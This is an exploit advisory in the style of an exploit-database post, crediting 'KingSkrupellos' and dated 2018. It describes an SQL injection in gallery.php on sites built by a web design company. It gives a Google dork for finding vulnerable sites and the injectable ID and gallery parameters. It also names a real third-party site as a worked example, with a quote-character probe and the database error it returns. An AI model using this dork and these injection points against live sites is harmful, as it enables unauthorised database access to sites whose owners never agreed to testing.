#################################################################################################
# Exploit Title : Site By www.clayrose.com Web Design Hosting Management SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : clayrose.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Site by www.clayrose.com''
# Exploit :
/gallery.php?ID=[SQL Inj]
/gallery.php?ID=[ID-NUMBER]&gallery=[SQL Inj]
#################################################################################################
# Example Site => rohanart.com/gallery.php?ID=50%27 => [ Proof of Concept ] => archive.is/gJ6RY
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/rohanart/public_html/gallery.php on line 186
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################